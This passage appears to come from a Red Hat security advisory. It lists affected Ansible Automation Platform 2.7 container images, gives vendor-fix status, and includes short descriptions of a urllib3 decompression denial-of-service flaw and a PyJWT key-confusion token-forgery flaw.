| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:e78dd744714feae5ae944c759759bff17c061c7ed2d3bd1454ba763131ed6ee0_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:de3d43a8d9a2cf0d533337e825b078205cc37b01c935a4f68ac152a8a7a7533c_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:eca1f9bd16210653a372e34a4f40ca4d6330618a2acba64f6f7c2e8e95026da1_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:a961d06200887f646ed797932c3159634581fe144e5f29f1fef47ddc859eed31_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:bd28a84fe3b750313749ec80d44cac88c7b06408b0caceea08d303f51c1f559a_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:3312c6acd7a577bd8b3ccda5a65f8505ff76e2acc7a46e7f290a49dfb53cfac4_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:c738cf5ef020b44a404402ddd660afc3d418a758751f848068bda4bc5bce0e35_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:adca5f837877df04696709a4826ccae31e2fdc50aa8bc32fabb4ef40cd51f0ef_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fb8342f0f6b8322194bc357c7d9c9d89ef6ca052b88c5618bbf768f555a54b13_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:2fab408777ea512f3cf8ac57d5989fa0017f6352dcead3a320d348a3e2ac1004_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:c014148a6140721bb7733d5f30c7adbe3e2cc6f8a7cd6c3a939ab96f8c9420ee_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:121e0bfb87b57655db4a735762a26e23f1b3de7b105cbf09bb300043601c1b43_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:6a06579accd268ca5203edab2e46b89166ae6024507cc5b4bed2e126cdef7986_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d02ae0212655f8ef70afc7a0656a2fbc95468228b003f6940d01cf4abeb5325b_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d10f226739a001a0efc0178f19a73fad722dc85484017d13f388f749a374ffea_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:302cf11b0faed78e07e863d4b1e7e31db47590b571239385475d8a4c3cda47dc_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:7dbf390d29d295f346662b605448a9748e24b8f541a84f55b6b7c81b87c46025_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:e6c019048612b124e9a2100220d46f242f0fd2302bbe42e674bf84c21a56b733_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:f07206e7881bd11636bebb95f7ec9a70cc817f07d7b34f792265a5ec91d4432b_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:7007f666eadfd7294801e6412e624dbc4bd2288f13ea8820ee55e7552f471831_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:d71829d8bd9bfdba7d248e2e2cd5795139382947889b71bb96b27f7d443e1591_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ce4ef5c8af91d2056a034f9559a5d92742b18aea7aeaf03d2bacfa92d67c5b9b_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ee347c1a7b52e512d6bdd65afda44f0e372abbaf4c1f81750f23fc473becf777_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3641db944490dd326c814487e1c10d5d9d079ba74f8321930ab277fe44b51705_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:7e6ea2d4253efb0aaabce270c56bf8ef84148592862608f501b639566b9996f0_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:41c9292a512f44347fc348afd6846e7e8832abde31452ee12ec8eca235acdce4_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:f30a9515d678d60e9ac035b876ecdaaa8a4852c87fe55e16bcabf598ad447b14_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:1ad72d1f577d63894eec4278c1b92b6e295cb3c0543b4dd2e93750c2cc83d535_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:5c5bc6761dbd47effea36014affa352bddd5a18696377967f1f50b75df2741fe_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:32560cdb08b7da9d671f9b035e595971c5bdf865c56eb6825b9a4910add1b9cf_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8ef224281fd23b4203da09336df25550db17b01f025e99b8e9821d4bc3ddedfc_amd64 | — |
A flaw was found in urllib3, an HTTP client library for Python. This vulnerability allows a remote attacker to cause excessive resource consumption, such as high CPU usage and massive memory allocation, on the client side. This occurs when urllib3 attempts to decompress an entire HTTP response, even if only a partial read was requested, or when draining the connection after a partial decompression. This can lead to a Denial of Service (DoS) condition.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:daefffce756c8c7918377279ada50a9cc127ab0939ed308c786940d5dc42e0d9_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:dfde61892d055e89b056f7fb8863f3a0961df2bb8890323b8301670fc8afc66b_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:3a04de6f43c1352f5df5c5a9e19fd8aad23d2921d23dcef8a9f5e121a87fe800_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:cdd7f08ba3846269e6932375c1a7bdb4ed3bfe062ba7bcd5a872def4293150a6_amd64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:51ed36bb2a95df762fa0239faf7bcc70b68dbd5f744bd2094f5e29ecc6700eb3_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:8426a97219763cb74366755416683d79e8b56c95da290b0fa2fff59a5db51db3_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:0ddbc5f91472e5872912da6131e71df85e87b79ef8ea3d38bb4247f1456d4a00_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:f75e2056244899ae5e2ecab1404663bf554f7451cc521e0d7a75a2f40ecac7a1_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:7dcd3a60624fa4f6c9f591ef8ffc48ba0f5152b7108a6070fa8f680c20168c95_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:a8135ef1879793f311f2661c380bd5fbbedc14a4d195aeaa5a4cb04ad4845f49_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:2211c0e7cd573bf30873329c46e91f98ff01fcb7e0753823d4c0517217c31ac3_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:a6903f68684eb8f5bc688b75e390727b5ed48b864784657e49611966266c9f3f_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5ffa88952441ddab19ada1bd2603e3614b75d10ef51e38098c2d22d8b358b518_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:afca3fb56256dcb7cb04a67fb52bff0160064c65f901a70fa3e97ed30ddaab7a_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:5e1a04dbcddc141f0026ccee871050cf974175b62c3d22b33e5ec3aec54128d3_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:ddb59951ccb324d8bd6ae9c6a6093f211bcb08d8cac7c4fb10f191e421aa59d3_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:55ad63ce31700829d0df23692d02cb7796404b122f790f9329f4b742c5f6783e_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:587ec88d08d4113f07778f81aae6de62c9e9d971b677b1375b547aa7dd1178c8_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:5aa7b2e33b9480f45faf8b4686bfb264838b5c1c62c537c5a2ec7b5a8617ac49_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:830fa58a60fbd7f768e236b2052edd1d37fc7cf383a0ccd65483b09fa5b07bd2_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:a18f77ccf6c524f5d0c11d34d6787b22548194b6897abd491de85b00fc1befd3_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:b58803576b7a2e119ffe83ceb252d8d402f1611c891c2c6ac7c4e0399acd848f_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:bd7350b62eb0f2de274eafd7dc32e4cf3073bd597e282268ff17777b9fe5d102_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:fe72e508123fdd2795959017e5572689b039d5bdfc675dc45673c5586fceea17_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:abaebe0c1fbc2a013fad8ec411a449705c8a78759b82ddbe661afd99e90dada5_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:c4f9e3356a2217008bd6f69325ae74d547703f1bcfe39bd74737f30c6914f711_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:017495624b22a5825231dd70443dc9ab359da0df5ea16a5a04e0f4dc915b6e0f_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:fcb7685115cfbf0a10ef87d6bb7a43c251c207a4fd7a31c5908cad85b6ae0e1a_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:d15bd832817f039fa3c09d6d74088254b6fae15a5efed7a88279a657b2f23f16_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:e78dd744714feae5ae944c759759bff17c061c7ed2d3bd1454ba763131ed6ee0_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:de3d43a8d9a2cf0d533337e825b078205cc37b01c935a4f68ac152a8a7a7533c_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:eca1f9bd16210653a372e34a4f40ca4d6330618a2acba64f6f7c2e8e95026da1_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:a961d06200887f646ed797932c3159634581fe144e5f29f1fef47ddc859eed31_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:bd28a84fe3b750313749ec80d44cac88c7b06408b0caceea08d303f51c1f559a_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:3312c6acd7a577bd8b3ccda5a65f8505ff76e2acc7a46e7f290a49dfb53cfac4_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:c738cf5ef020b44a404402ddd660afc3d418a758751f848068bda4bc5bce0e35_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:adca5f837877df04696709a4826ccae31e2fdc50aa8bc32fabb4ef40cd51f0ef_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fb8342f0f6b8322194bc357c7d9c9d89ef6ca052b88c5618bbf768f555a54b13_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:2fab408777ea512f3cf8ac57d5989fa0017f6352dcead3a320d348a3e2ac1004_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:c014148a6140721bb7733d5f30c7adbe3e2cc6f8a7cd6c3a939ab96f8c9420ee_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:121e0bfb87b57655db4a735762a26e23f1b3de7b105cbf09bb300043601c1b43_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:6a06579accd268ca5203edab2e46b89166ae6024507cc5b4bed2e126cdef7986_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d02ae0212655f8ef70afc7a0656a2fbc95468228b003f6940d01cf4abeb5325b_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d10f226739a001a0efc0178f19a73fad722dc85484017d13f388f749a374ffea_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:302cf11b0faed78e07e863d4b1e7e31db47590b571239385475d8a4c3cda47dc_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:7dbf390d29d295f346662b605448a9748e24b8f541a84f55b6b7c81b87c46025_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:e6c019048612b124e9a2100220d46f242f0fd2302bbe42e674bf84c21a56b733_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:f07206e7881bd11636bebb95f7ec9a70cc817f07d7b34f792265a5ec91d4432b_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:7007f666eadfd7294801e6412e624dbc4bd2288f13ea8820ee55e7552f471831_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:d71829d8bd9bfdba7d248e2e2cd5795139382947889b71bb96b27f7d443e1591_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ce4ef5c8af91d2056a034f9559a5d92742b18aea7aeaf03d2bacfa92d67c5b9b_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ee347c1a7b52e512d6bdd65afda44f0e372abbaf4c1f81750f23fc473becf777_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3641db944490dd326c814487e1c10d5d9d079ba74f8321930ab277fe44b51705_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:7e6ea2d4253efb0aaabce270c56bf8ef84148592862608f501b639566b9996f0_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:41c9292a512f44347fc348afd6846e7e8832abde31452ee12ec8eca235acdce4_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:f30a9515d678d60e9ac035b876ecdaaa8a4852c87fe55e16bcabf598ad447b14_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:1ad72d1f577d63894eec4278c1b92b6e295cb3c0543b4dd2e93750c2cc83d535_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:5c5bc6761dbd47effea36014affa352bddd5a18696377967f1f50b75df2741fe_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:32560cdb08b7da9d671f9b035e595971c5bdf865c56eb6825b9a4910add1b9cf_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8ef224281fd23b4203da09336df25550db17b01f025e99b8e9821d4bc3ddedfc_amd64 | — |
A flaw was found in PyJWT, a Python library for JSON Web Token (JWT) implementation. When decoding JWTs, the library fails to validate the use of JSON Web Keys (JWK) in the HMAC algorithm while also supporting asymmetric algorithms. This allows a remote attacker to use the issuer's public key as the secret key for the HMAC algorithm, leading to the ability to forge JWTs. This vulnerability can result in authentication bypass or unauthorized access.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:017495624b22a5825231dd70443dc9ab359da0df5ea16a5a04e0f4dc915b6e0f_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:fcb7685115cfbf0a10ef87d6bb7a43c251c207a4fd7a31c5908cad85b6ae0e1a_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:3a04de6f43c1352f5df5c5a9e19fd8aad23d2921d23dcef8a9f5e121a87fe800_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:cdd7f08ba3846269e6932375c1a7bdb4ed3bfe062ba7bcd5a872def4293150a6_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:2fab408777ea512f3cf8ac57d5989fa0017f6352dcead3a320d348a3e2ac1004_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:c014148a6140721bb7733d5f30c7adbe3e2cc6f8a7cd6c3a939ab96f8c9420ee_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d02ae0212655f8ef70afc7a0656a2fbc95468228b003f6940d01cf4abeb5325b_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d10f226739a001a0efc0178f19a73fad722dc85484017d13f388f749a374ffea_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:e6c019048612b124e9a2100220d46f242f0fd2302bbe42e674bf84c21a56b733_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:f07206e7881bd11636bebb95f7ec9a70cc817f07d7b34f792265a5ec91d4432b_arm64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:51ed36bb2a95df762fa0239faf7bcc70b68dbd5f744bd2094f5e29ecc6700eb3_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:8426a97219763cb74366755416683d79e8b56c95da290b0fa2fff59a5db51db3_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:0ddbc5f91472e5872912da6131e71df85e87b79ef8ea3d38bb4247f1456d4a00_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:f75e2056244899ae5e2ecab1404663bf554f7451cc521e0d7a75a2f40ecac7a1_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:7dcd3a60624fa4f6c9f591ef8ffc48ba0f5152b7108a6070fa8f680c20168c95_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:a8135ef1879793f311f2661c380bd5fbbedc14a4d195aeaa5a4cb04ad4845f49_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:2211c0e7cd573bf30873329c46e91f98ff01fcb7e0753823d4c0517217c31ac3_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:a6903f68684eb8f5bc688b75e390727b5ed48b864784657e49611966266c9f3f_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5ffa88952441ddab19ada1bd2603e3614b75d10ef51e38098c2d22d8b358b518_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:afca3fb56256dcb7cb04a67fb52bff0160064c65f901a70fa3e97ed30ddaab7a_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:5e1a04dbcddc141f0026ccee871050cf974175b62c3d22b33e5ec3aec54128d3_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:ddb59951ccb324d8bd6ae9c6a6093f211bcb08d8cac7c4fb10f191e421aa59d3_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:55ad63ce31700829d0df23692d02cb7796404b122f790f9329f4b742c5f6783e_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:587ec88d08d4113f07778f81aae6de62c9e9d971b677b1375b547aa7dd1178c8_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:5aa7b2e33b9480f45faf8b4686bfb264838b5c1c62c537c5a2ec7b5a8617ac49_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:830fa58a60fbd7f768e236b2052edd1d37fc7cf383a0ccd65483b09fa5b07bd2_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:a18f77ccf6c524f5d0c11d34d6787b22548194b6897abd491de85b00fc1befd3_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:b58803576b7a2e119ffe83ceb252d8d402f1611c891c2c6ac7c4e0399acd848f_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:daefffce756c8c7918377279ada50a9cc127ab0939ed308c786940d5dc42e0d9_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:dfde61892d055e89b056f7fb8863f3a0961df2bb8890323b8301670fc8afc66b_amd64 | — | ||
